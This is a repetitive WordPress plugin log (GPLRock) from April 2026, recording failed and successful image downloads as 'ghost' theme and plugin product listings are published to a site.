https://meldwp.com/wp-content/uploads/bascart---multivendor-marketplace--woocommerce-wordpress-theme-with-builder-2524.webp for product bascart-multivendor-marketplace-woocommerce-wordpress-theme-with-builder after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:05:59 UTC] GPLRock WARNING: Image download failed for product bascart-multivendor-marketplace-woocommerce-wordpress-theme-with-builder. URL: https://meldwp.com/wp-content/uploads/bascart---multivendor-marketplace--woocommerce-wordpress-theme-with-builder-2524.webp [02-Apr-2026 20:05:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bascart-multivendor-marketplace-woocommerce-wordpress-theme-with-builder [02-Apr-2026 20:05:59 UTC] GPLRock: Image download failed for product mediguss-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:02 UTC] GPLRock: Image download failed for product mediguss-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mediguss---medical-wordpress-theme-19447.webp for product mediguss-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:06:04 UTC] GPLRock: Image download failed for product mediguss-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:06 UTC] GPLRock: Image download failed for product mediguss-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mediguss---medical-wordpress-theme-19447.webp for product mediguss-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:06:08 UTC] GPLRock WARNING: Image download failed for product mediguss-medical-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mediguss---medical-wordpress-theme-19447.webp [02-Apr-2026 20:06:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mediguss-medical-wordpress-theme [02-Apr-2026 20:06:08 UTC] GPLRock: Image download failed for product techlink-technology-and-it-solutions-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:10 UTC] GPLRock: Image download failed for product techlink-technology-and-it-solutions-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/techlink---technology-and-it-solutions-wordpress-theme-22085.webp for product techlink-technology-and-it-solutions-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:06:13 UTC] GPLRock: Image download failed for product techlink-technology-and-it-solutions-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:15 UTC] GPLRock: Image download failed for product techlink-technology-and-it-solutions-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/techlink---technology-and-it-solutions-wordpress-theme-22085.webp for product techlink-technology-and-it-solutions-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:06:17 UTC] GPLRock WARNING: Image download failed for product techlink-technology-and-it-solutions-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/techlink---technology-and-it-solutions-wordpress-theme-22085.webp [02-Apr-2026 20:06:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: techlink-technology-and-it-solutions-wordpress-theme [02-Apr-2026 20:06:17 UTC] GPLRock: Image download failed for product fode-portfolio-theme-for-creatives (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:19 UTC] GPLRock: Image download failed for product fode-portfolio-theme-for-creatives (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fode---portfolio-theme-for-creatives-23069.webp for product fode-portfolio-theme-for-creatives after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:06:21 UTC] GPLRock: Image download failed for product fode-portfolio-theme-for-creatives (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:23 UTC] GPLRock: Image download failed for product fode-portfolio-theme-for-creatives (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fode---portfolio-theme-for-creatives-23069.webp for product fode-portfolio-theme-for-creatives after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:06:25 UTC] GPLRock WARNING: Image download failed for product fode-portfolio-theme-for-creatives. URL: https://meldwp.com/wp-content/uploads/fode---portfolio-theme-for-creatives-23069.webp [02-Apr-2026 20:06:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fode-portfolio-theme-for-creatives [02-Apr-2026 20:06:26 UTC] GPLRock: Image download failed for product mezzo-a-personal-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:28 UTC] GPLRock: Image download failed for product mezzo-a-personal-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mezzo--a-personal-wordpress-blog-theme-7896.webp for product mezzo-a-personal-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:06:30 UTC] GPLRock: Image download failed for product mezzo-a-personal-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:32 UTC] GPLRock: Image download failed for product mezzo-a-personal-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mezzo--a-personal-wordpress-blog-theme-7896.webp for product mezzo-a-personal-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:06:34 UTC] GPLRock WARNING: Image download failed for product mezzo-a-personal-wordpress-blog-theme. URL: https://meldwp.com/wp-content/uploads/mezzo--a-personal-wordpress-blog-theme-7896.webp [02-Apr-2026 20:06:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mezzo-a-personal-wordpress-blog-theme [02-Apr-2026 20:06:34 UTC] GPLRock: Image download failed for product glee-multipurpose-woocommerce-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:36 UTC] GPLRock: Image download failed for product glee-multipurpose-woocommerce-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/glee---multipurpose-woocommerce-wordpress-theme--rtl-16514.webp for product glee-multipurpose-woocommerce-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:06:39 UTC] GPLRock: Image download failed for product glee-multipurpose-woocommerce-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:41 UTC] GPLRock: Image download failed for product glee-multipurpose-woocommerce-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/glee---multipurpose-woocommerce-wordpress-theme--rtl-16514.webp for product glee-multipurpose-woocommerce-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:06:43 UTC] GPLRock WARNING: Image download failed for product glee-multipurpose-woocommerce-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/glee---multipurpose-woocommerce-wordpress-theme--rtl-16514.webp [02-Apr-2026 20:06:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: glee-multipurpose-woocommerce-wordpress-theme-rtl [02-Apr-2026 20:06:43 UTC] GPLRock: Image download failed for product viceversa-minimal-photography-and-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:45 UTC] GPLRock: Image download failed for product viceversa-minimal-photography-and-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/viceversa---minimal-photography-and-portfolio-wordpress-theme-26508.webp for product viceversa-minimal-photography-and-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:06:47 UTC] GPLRock: Image download failed for product viceversa-minimal-photography-and-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:49 UTC] GPLRock: Image download failed for product viceversa-minimal-photography-and-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/viceversa---minimal-photography-and-portfolio-wordpress-theme-26508.webp for product viceversa-minimal-photography-and-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:06:52 UTC] GPLRock WARNING: Image download failed for product viceversa-minimal-photography-and-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/viceversa---minimal-photography-and-portfolio-wordpress-theme-26508.webp [02-Apr-2026 20:06:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: viceversa-minimal-photography-and-portfolio-wordpress-theme [02-Apr-2026 20:06:52 UTC] GPLRock: Image download failed for product robust-premium-bootstrap-4-admin-dashboard-webapp-kit-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:54 UTC] GPLRock: Image download failed for product robust-premium-bootstrap-4-admin-dashboard-webapp-kit-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/robust---premium-bootstrap-4-admin-dashboard--webapp-kit-template-17312.webp for product robust-premium-bootstrap-4-admin-dashboard-webapp-kit-template after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:06:56 UTC] GPLRock: Image download failed for product robust-premium-bootstrap-4-admin-dashboard-webapp-kit-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:06:58 UTC] GPLRock: Image download failed for product robust-premium-bootstrap-4-admin-dashboard-webapp-kit-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/robust---premium-bootstrap-4-admin-dashboard--webapp-kit-template-17312.webp for product robust-premium-bootstrap-4-admin-dashboard-webapp-kit-template after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:07:00 UTC] GPLRock WARNING: Image download failed for product robust-premium-bootstrap-4-admin-dashboard-webapp-kit-template. URL: https://meldwp.com/wp-content/uploads/robust---premium-bootstrap-4-admin-dashboard--webapp-kit-template-17312.webp [02-Apr-2026 20:07:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: robust-premium-bootstrap-4-admin-dashboard-webapp-kit-template [02-Apr-2026 20:07:14 UTC] GPLRock: Image download failed for product ecohosting-responsive-hosting-and-whmcs-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:16 UTC] GPLRock: Image download failed for product ecohosting-responsive-hosting-and-whmcs-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecohosting--responsive-hosting-and-whmcs-wordpress-theme-25688.webp for product ecohosting-responsive-hosting-and-whmcs-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:07:19 UTC] GPLRock: Image download failed for product ecohosting-responsive-hosting-and-whmcs-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:21 UTC] GPLRock: Image download failed for product ecohosting-responsive-hosting-and-whmcs-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecohosting--responsive-hosting-and-whmcs-wordpress-theme-25688.webp for product ecohosting-responsive-hosting-and-whmcs-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:07:23 UTC] GPLRock WARNING: Image download failed for product ecohosting-responsive-hosting-and-whmcs-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ecohosting--responsive-hosting-and-whmcs-wordpress-theme-25688.webp [02-Apr-2026 20:07:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ecohosting-responsive-hosting-and-whmcs-wordpress-theme [02-Apr-2026 20:07:23 UTC] GPLRock: Image download failed for product thebuilt-construction-and-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:25 UTC] GPLRock: Image download failed for product thebuilt-construction-and-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/thebuilt---construction-and-architecture-wordpress-theme-17026.webp for product thebuilt-construction-and-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:07:27 UTC] GPLRock: Image download failed for product thebuilt-construction-and-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:29 UTC] GPLRock: Image download failed for product thebuilt-construction-and-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/thebuilt---construction-and-architecture-wordpress-theme-17026.webp for product thebuilt-construction-and-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:07:31 UTC] GPLRock WARNING: Image download failed for product thebuilt-construction-and-architecture-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/thebuilt---construction-and-architecture-wordpress-theme-17026.webp [02-Apr-2026 20:07:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: thebuilt-construction-and-architecture-wordpress-theme [02-Apr-2026 20:07:32 UTC] GPLRock: Image download failed for product unicoz-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:34 UTC] GPLRock: Image download failed for product unicoz-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/unicoz---elementor-woocommerce-theme-24049.webp for product unicoz-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:07:36 UTC] GPLRock: Image download failed for product unicoz-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:38 UTC] GPLRock: Image download failed for product unicoz-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/unicoz---elementor-woocommerce-theme-24049.webp for product unicoz-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:07:40 UTC] GPLRock WARNING: Image download failed for product unicoz-elementor-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/unicoz---elementor-woocommerce-theme-24049.webp [02-Apr-2026 20:07:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: unicoz-elementor-woocommerce-theme [02-Apr-2026 20:07:41 UTC] GPLRock: Image download failed for product nexmart-multipurpose-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:43 UTC] GPLRock: Image download failed for product nexmart-multipurpose-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nexmart---multipurpose-woocommerce-wordpress-theme-18935.webp for product nexmart-multipurpose-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:07:45 UTC] GPLRock: Image download failed for product nexmart-multipurpose-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:47 UTC] GPLRock: Image download failed for product nexmart-multipurpose-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nexmart---multipurpose-woocommerce-wordpress-theme-18935.webp for product nexmart-multipurpose-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:07:49 UTC] GPLRock WARNING: Image download failed for product nexmart-multipurpose-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nexmart---multipurpose-woocommerce-wordpress-theme-18935.webp [02-Apr-2026 20:07:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nexmart-multipurpose-woocommerce-wordpress-theme [02-Apr-2026 20:07:49 UTC] GPLRock: Image download failed for product bengkel-modern-auto-car-repair-business-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:51 UTC] GPLRock: Image download failed for product bengkel-modern-auto-car-repair-business-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bengkel---modern-auto-car-repair-business-theme-9791.webp for product bengkel-modern-auto-car-repair-business-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:07:54 UTC] GPLRock: Image download failed for product bengkel-modern-auto-car-repair-business-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:56 UTC] GPLRock: Image download failed for product bengkel-modern-auto-car-repair-business-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:07:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bengkel---modern-auto-car-repair-business-theme-9791.webp for product bengkel-modern-auto-car-repair-business-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:07:58 UTC] GPLRock WARNING: Image download failed for product bengkel-modern-auto-car-repair-business-theme. URL: https://meldwp.com/wp-content/uploads/bengkel---modern-auto-car-repair-business-theme-9791.webp [02-Apr-2026 20:07:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bengkel-modern-auto-car-repair-business-theme [02-Apr-2026 20:07:58 UTC] GPLRock: Image download failed for product trion-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:00 UTC] GPLRock: Image download failed for product trion-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/trion---portfolio-wordpress-theme-26806.webp for product trion-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:08:03 UTC] GPLRock: Image download failed for product trion-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:05 UTC] GPLRock: Image download failed for product trion-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/trion---portfolio-wordpress-theme-26806.webp for product trion-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:08:07 UTC] GPLRock WARNING: Image download failed for product trion-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/trion---portfolio-wordpress-theme-26806.webp [02-Apr-2026 20:08:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: trion-portfolio-wordpress-theme [02-Apr-2026 20:08:07 UTC] GPLRock: Image download failed for product craft-portfolio-architecture-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:09 UTC] GPLRock: Image download failed for product craft-portfolio-architecture-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/craft-portfolio---architecture--design-wordpress-theme-21785.webp for product craft-portfolio-architecture-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:08:11 UTC] GPLRock: Image download failed for product craft-portfolio-architecture-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:13 UTC] GPLRock: Image download failed for product craft-portfolio-architecture-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/craft-portfolio---architecture--design-wordpress-theme-21785.webp for product craft-portfolio-architecture-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:08:15 UTC] GPLRock WARNING: Image download failed for product craft-portfolio-architecture-design-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/craft-portfolio---architecture--design-wordpress-theme-21785.webp [02-Apr-2026 20:08:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: craft-portfolio-architecture-design-wordpress-theme [02-Apr-2026 20:08:16 UTC] GPLRock: Image download failed for product mega-project-construction-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:18 UTC] GPLRock: Image download failed for product mega-project-construction-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mega-project---construction-wordpress-28868.webp for product mega-project-construction-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:08:20 UTC] GPLRock: Image download failed for product mega-project-construction-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:22 UTC] GPLRock: Image download failed for product mega-project-construction-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mega-project---construction-wordpress-28868.webp for product mega-project-construction-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:08:24 UTC] GPLRock WARNING: Image download failed for product mega-project-construction-wordpress. URL: https://meldwp.com/wp-content/uploads/mega-project---construction-wordpress-28868.webp [02-Apr-2026 20:08:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mega-project-construction-wordpress [02-Apr-2026 20:08:24 UTC] GPLRock: Image download failed for product helix-yoga-club-calendar-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:26 UTC] GPLRock: Image download failed for product helix-yoga-club-calendar-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/helix---yoga-club-calendar-wordpress-theme-2944.webp for product helix-yoga-club-calendar-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:08:29 UTC] GPLRock: Image download failed for product helix-yoga-club-calendar-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:31 UTC] GPLRock: Image download failed for product helix-yoga-club-calendar-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/helix---yoga-club-calendar-wordpress-theme-2944.webp for product helix-yoga-club-calendar-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:08:33 UTC] GPLRock WARNING: Image download failed for product helix-yoga-club-calendar-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/helix---yoga-club-calendar-wordpress-theme-2944.webp [02-Apr-2026 20:08:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: helix-yoga-club-calendar-wordpress-theme [02-Apr-2026 20:08:33 UTC] GPLRock: Image download failed for product garda-gardening-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:35 UTC] GPLRock: Image download failed for product garda-gardening-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/garda---gardening-wordpress-theme-23183.webp for product garda-gardening-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:08:37 UTC] GPLRock: Image download failed for product garda-gardening-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:39 UTC] GPLRock: Image download failed for product garda-gardening-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:08:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/garda---gardening-wordpress-theme-23183.webp for product garda-gardening-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:08:41 UTC] GPLRock WARNING: Image download failed for product garda-gardening-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/garda---gardening-wordpress-theme-23183.webp [02-Apr-2026 20:08:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: garda-gardening-wordpress-theme [02-Apr-2026 20:09:25 UTC] GPLRock: Image downloaded successfully for product gravityview-diy-layout (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e0569500.jpg [02-Apr-2026 20:09:25 UTC] GPLRock: Using pre-downloaded image for product gravityview-diy-layout: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e0569500.jpg [02-Apr-2026 20:09:25 UTC] GPLRock: Ghost product published with image - Product ID: gravityview-diy-layout [02-Apr-2026 20:09:27 UTC] GPLRock: Image downloaded successfully for product blog-manager-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-35e137d4.jpg [02-Apr-2026 20:09:27 UTC] GPLRock: Using pre-downloaded image for product blog-manager-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-35e137d4.jpg [02-Apr-2026 20:09:27 UTC] GPLRock: Ghost product published with image - Product ID: blog-manager-for-wordpress [02-Apr-2026 20:09:29 UTC] GPLRock: Image downloaded successfully for product searchwp-co-authors-plus-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2b21443b.jpg [02-Apr-2026 20:09:29 UTC] GPLRock: Using pre-downloaded image for product searchwp-co-authors-plus-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2b21443b.jpg [02-Apr-2026 20:09:29 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-co-authors-plus-integration [02-Apr-2026 20:09:30 UTC] GPLRock: Image downloaded successfully for product yith-product-description-in-loop-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-231c0068.jpg [02-Apr-2026 20:09:30 UTC] GPLRock: Using pre-downloaded image for product yith-product-description-in-loop-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-231c0068.jpg [02-Apr-2026 20:09:30 UTC] GPLRock: Ghost product published with image - Product ID: yith-product-description-in-loop-for-woocommerce [02-Apr-2026 20:09:32 UTC] GPLRock: Image downloaded successfully for product handy-handmade-shop-wordpress-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ba5c4b92.jpg [02-Apr-2026 20:09:32 UTC] GPLRock: Using pre-downloaded image for product handy-handmade-shop-wordpress-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ba5c4b92.jpg [02-Apr-2026 20:09:32 UTC] GPLRock: Ghost product published with image - Product ID: handy-handmade-shop-wordpress-woocommerce-theme [02-Apr-2026 20:09:34 UTC] GPLRock: Image downloaded successfully for product mythemeshop-my-wp-backup-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a5063a44.jpg [02-Apr-2026 20:09:34 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-my-wp-backup-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a5063a44.jpg [02-Apr-2026 20:09:34 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-my-wp-backup-pro [02-Apr-2026 20:09:35 UTC] GPLRock: Image downloaded successfully for product woocommerce-product-tab-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-79d7cc2f.jpg [02-Apr-2026 20:09:35 UTC] GPLRock: Using pre-downloaded image for product woocommerce-product-tab-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-79d7cc2f.jpg [02-Apr-2026 20:09:35 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-product-tab-pro [02-Apr-2026 20:09:37 UTC] 